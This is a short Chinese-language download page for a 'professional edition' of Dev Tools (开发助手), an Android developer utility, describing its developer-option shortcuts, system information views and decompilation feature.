Dev Tools 开发助手v10.1.1专业版 反编译等多功能 Dev Tools 开发助手v10.1.1专业版 反编译等多功能插图 软件介绍 开发助手能够用来快速调试应用以及查看手机软硬件相关信息,包括:快速打开或关闭开发者选项中的选项。 将原来几十秒的操作缩短为一次点击。包括显示布局边界,显示 GPU 过度绘制。显示布局更新。强制 GPU 渲染 显示 GPU 视图更新,显示指针位置,严格模式,不保留活动,不锁定屏幕。 每个工具可以通过长按工具图标添加快捷方式到桌面,以后连打开App都省了。 快速查看系统版本信息,硬件信息,屏幕信息,CPU 信息,虚拟机信息,网络相关信息,ID 相关信息。 快速开启设置,语言切换,开发者选项,我的应用。 ⬇️ 下载地址 下载后请先检查文件完整性,如有问题请在评论区反馈